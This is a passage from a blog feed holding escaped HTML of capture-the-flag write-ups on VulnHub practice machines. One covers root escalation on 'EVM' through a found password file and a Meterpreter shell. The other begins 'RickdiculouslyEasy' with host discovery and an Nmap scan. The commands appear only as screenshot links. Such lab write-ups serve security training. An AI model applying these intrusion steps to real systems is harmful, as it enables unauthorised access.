src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnKEYcsAmtCktnxaCYnPOKfRjPIrvPqQzAgZhNuTcUG7lXXhyphenhyphensOOAsCpUyhtD1C5T_mFziHfLeioSBWgx5SSmewzlhsUtFmTWwrJIC9EWRJAfeP5GAdbuaiiSvREuXvEXL4PfuZ986iuz_/s16000/screenshot.15.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Inside &lt;b&gt;root3r&lt;/b&gt; there is a text file &lt;b&gt;.root_password_ssh.txt &lt;/b&gt;where we can find the password &lt;b&gt;willy26:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixrWgD3C0W1nb5PSmQItopyCRX8zzb09TVgLg6tjOJnKBhb9NGlonNwXzFzhgzeiyjeuD4jTLmH_aA-edT5HGWGCzRoR5g6sl_dB3fu48RCK2OVr0Rp0pmjGjISxptT5EPW3yIHUu_PZtw/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;377&quot; data-original-width=&quot;934&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixrWgD3C0W1nb5PSmQItopyCRX8zzb09TVgLg6tjOJnKBhb9NGlonNwXzFzhgzeiyjeuD4jTLmH_aA-edT5HGWGCzRoR5g6sl_dB3fu48RCK2OVr0Rp0pmjGjISxptT5EPW3yIHUu_PZtw/s16000/screenshot.16.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS1zdYcD-UfoxhTD-TS59mBDmnUWB7OIxbxGi9-M5jpRQPyLyL4hhg8x9C22e1lr1rObzKK5kjsuU5dnDORlmgoyKpoR2JunVcaNWY55UXyy-Rl0RZkTyGlE2DyWRU80RQujA0NcUbuUxC/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;46&quot; data-original-width=&quot;460&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS1zdYcD-UfoxhTD-TS59mBDmnUWB7OIxbxGi9-M5jpRQPyLyL4hhg8x9C22e1lr1rObzKK5kjsuU5dnDORlmgoyKpoR2JunVcaNWY55UXyy-Rl0RZkTyGlE2DyWRU80RQujA0NcUbuUxC/s16000/screenshot.17.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However it is not valid to SSH as a root:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZx-jAsKtplxKeoom7iDl5NboU4SlgnTMVnT2gvHnsJYSKFG9_Tu2DTHd3iOuExSdFLwsQWifXxYB9y3acSjfiEcAADYcD1PBFh2XTAGE0PhejErlpNy46LsTSRhkURef2DfCXC7xoYCP8/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;94&quot; data-original-width=&quot;426&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZx-jAsKtplxKeoom7iDl5NboU4SlgnTMVnT2gvHnsJYSKFG9_Tu2DTHd3iOuExSdFLwsQWifXxYB9y3acSjfiEcAADYcD1PBFh2XTAGE0PhejErlpNy46LsTSRhkURef2DfCXC7xoYCP8/s16000/screenshot.19.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying another way, to switch as a root from the Meterpreter session we need a shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWqQYsR5tVUjRrw0oFQH5brmnwnG4u3YJe5frJc3pox9qU-rRxxcdjIZvTuTTJqNoGDEsBB0Nef0BpI1YgZgOs8Fy-zz-L3LpxSKZnCwFYc2Ae9XD3FdXft325edG48rTsZhyPbxMlGND3/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;168&quot; data-original-width=&quot;607&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWqQYsR5tVUjRrw0oFQH5brmnwnG4u3YJe5frJc3pox9qU-rRxxcdjIZvTuTTJqNoGDEsBB0Nef0BpI1YgZgOs8Fy-zz-L3LpxSKZnCwFYc2Ae9XD3FdXft325edG48rTsZhyPbxMlGND3/s16000/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Improving the shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaS_Km0YKYfS-u8JP2lV9IvFttUPOb6AsqzQPHQF2gQUeAt7ng4urOE_pM4jyGQJONBS-vktSoJhyphenhyphen1g6WOFWrBkQgeWflPB190EfWL-hBd1U5ttVUhKmVmwndJbZ2SfOo12Nk3qmWnsK2J/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;119&quot; data-original-width=&quot;661&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaS_Km0YKYfS-u8JP2lV9IvFttUPOb6AsqzQPHQF2gQUeAt7ng4urOE_pM4jyGQJONBS-vktSoJhyphenhyphen1g6WOFWrBkQgeWflPB190EfWL-hBd1U5ttVUhKmVmwndJbZ2SfOo12Nk3qmWnsK2J/s16000/screenshot.28.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now a root shell is achieved:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZJWtnrkVqqpkFuPSu1UrVHyKySXeOAu_APcWnUG0D3QcoKCSf9pQRGEKYnLwlJeMimUAeImX3xE9ItTRhrukMadKRg0EJU0nIUlXRh3TtSL52x_FAQ4GeoJFCkTvm8MbISG7iR3SxbejA/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;171&quot; data-original-width=&quot;758&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZJWtnrkVqqpkFuPSu1UrVHyKySXeOAu_APcWnUG0D3QcoKCSf9pQRGEKYnLwlJeMimUAeImX3xE9ItTRhrukMadKRg0EJU0nIUlXRh3TtSL52x_FAQ4GeoJFCkTvm8MbISG7iR3SxbejA/s16000/screenshot.21.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally, reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdM1frbkE3hVVOXqtmQL-sVDltY9b8q5n8rTXzC5Xa4SdVB0mO6E6Q7Ei5e87rpfjwzdnCIJ2-nUAWup-s2QQJ2qFaNB-wDP3M7DgD87FyI0qc1T4yDFH7KbM-2G1KduQHt70riWA_rZ8I/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;415&quot; data-original-width=&quot;717&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdM1frbkE3hVVOXqtmQL-sVDltY9b8q5n8rTXzC5Xa4SdVB0mO6E6Q7Ei5e87rpfjwzdnCIJ2-nUAWup-s2QQJ2qFaNB-wDP3M7DgD87FyI0qc1T4yDFH7KbM-2G1KduQHt70riWA_rZ8I/s16000/screenshot.22.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4987567849134413275'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4987567849134413275'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/01/evm.html' title='EVM'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXYoEndKjb9d94HxNogZ4L-bC5hRA4RqwnMEoH55IGzKxLCAzmZ9dzVNziXJeRpOkNqAr8i6flilV78sOpahp8W2um0_SS2_DUTxiSmMoDKmFyqoIZqO1a9Z0ehNDJJqbBbrMy2gXWWgNu/s72-c/screenshot.26.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-737254483528879923</id><published>2022-01-19T13:26:00.005-06:00</published><updated>2022-02-03T11:28:55.580-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>RickdiculouslyEasy</title><content type='html'>&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;RICKDICULOUSLY EASY&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe-Vz9QnPYffWPnE27RN905vk-WsmmpRAnEsMAGZhZFrqP55uK3ZdT9-rLlnlDBRegd23uU-wWp2gCmJn9R3m4GQnbYvjpYrdikCCgBZzaGbrPSbtfLqmI4ZVgbNTmUV7FskwXloHeJEX9/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;256&quot; data-original-width=&quot;653&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe-Vz9QnPYffWPnE27RN905vk-WsmmpRAnEsMAGZhZFrqP55uK3ZdT9-rLlnlDBRegd23uU-wWp2gCmJn9R3m4GQnbYvjpYrdikCCgBZzaGbrPSbtfLqmI4ZVgbNTmUV7FskwXloHeJEX9/s16000/screenshot.88.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;RickdiculouslyEasy&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp; &lt;b&gt;RickdiculouslyEasy&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once downloaded&amp;nbsp;&lt;b&gt;RickdiculouslyEasy&lt;/b&gt;&amp;nbsp;and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB8LAVaE_CP8pdeCqWnhDulRCw0IMph_mZ1ZIDb_O1ZRCnVQ-h4fw2Xk-bk5q3uB521Vckkm2PWMVpykImOenL7ZGaiAZMwU0xyz143YBK2EgSoKFq3LnQ-lnPWuwsD53L1OiNtWOgjNl2/&quot; style=&quot;clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;210&quot; data-original-width=&quot;459&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB8LAVaE_CP8pdeCqWnhDulRCw0IMph_mZ1ZIDb_O1ZRCnVQ-h4fw2Xk-bk5q3uB521Vckkm2PWMVpykImOenL7ZGaiAZMwU0xyz143YBK2EgSoKFq3LnQ-lnPWuwsD53L1OiNtWOgjNl2/s16000/screenshot.1.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Description of the virtual machine says that there are &lt;b&gt;130 points&lt;/b&gt; worth of &lt;b&gt;FLAGs&lt;/b&gt; available:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvjc9k4BITg1LR9yWM8lEbvR2SItTTTfWZFTFrmIedqSu9A13dPhyphenhyphen8eBjgnl67zensViFNUrrEhrthQiieAfIg0s_q9Ya22x8P5YgvF2xNuE12VmbXqMCffARzfv44SnJvhi2fVIO5woN1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;218&quot; data-original-width=&quot;971&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvjc9k4BITg1LR9yWM8lEbvR2SItTTTfWZFTFrmIedqSu9A13dPhyphenhyphen8eBjgnl67zensViFNUrrEhrthQiieAfIg0s_q9Ya22x8P5YgvF2xNuE12VmbXqMCffARzfv44SnJvhi2fVIO5woN1/s16000/screenshot.86.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Searching for IP 192.168.1.29:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNhssn6VM260oAh_h9V-JtIwsk66amD1hnRI1L_-18VFVttxTZrqC1iMxILP21fnto_ZxZIMU0dWpdF_TEhHzqF_rlR5I7ey90cCuX11GweQtBjz58urSbV3oZi25H7DRb3DwLOjZOi5aJ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;26&quot; data-original-width=&quot;611&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNhssn6VM260oAh_h9V-JtIwsk66amD1hnRI1L_-18VFVttxTZrqC1iMxILP21fnto_ZxZIMU0dWpdF_TEhHzqF_rlR5I7ey90cCuX11GweQtBjz58urSbV3oZi25H7DRb3DwLOjZOi5aJ/s16000/screenshot.3.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja6sfXgm9rzf44k4rLU7VScxrrLLH6spT-SSI6JK77HMG9ea5rQn_TQBQ_RdVEwMfAKeJagtSq-SE5PlVI54j4zBb_z9v0NFptWEmSKSUvx1uEStuiA72pnWkkjzvYVeweN9PzYke8aROg/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;205&quot; data-original-width=&quot;842&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja6sfXgm9rzf44k4rLU7VScxrrLLH6spT-SSI6JK77HMG9ea5rQn_TQBQ_RdVEwMfAKeJagtSq-SE5PlVI54j4zBb_z9v0NFptWEmSKSUvx1uEStuiA72pnWkkjzvYVeweN9PzYke8aROg/s16000/screenshot.2.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihIxPnbSxWQxFf_QmnoYsOBT1DTrfEB1y7uSic04aMceqWC8lW0-sCs6OFjhAtNF9Dk7dTgm98Ah5k4M_BJLEFxa6LhTkW4CsJT7rTuv19WDzo4QumvbMjLJsxStoddEeDW4ZU5haKKpW2/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;300&quot; data-original-width=&quot;502&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihIxPnbSxWQxFf_QmnoYsOBT1DTrfEB1y7uSic04aMceqWC8lW0-sCs6OFjhAtNF9Dk7dTgm98Ah5k4M_BJLEFxa6LhTkW4CsJT7rTuv19WDzo4QumvbMjLJsxStoddEeDW4ZU5haKKpW2/s16000/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: 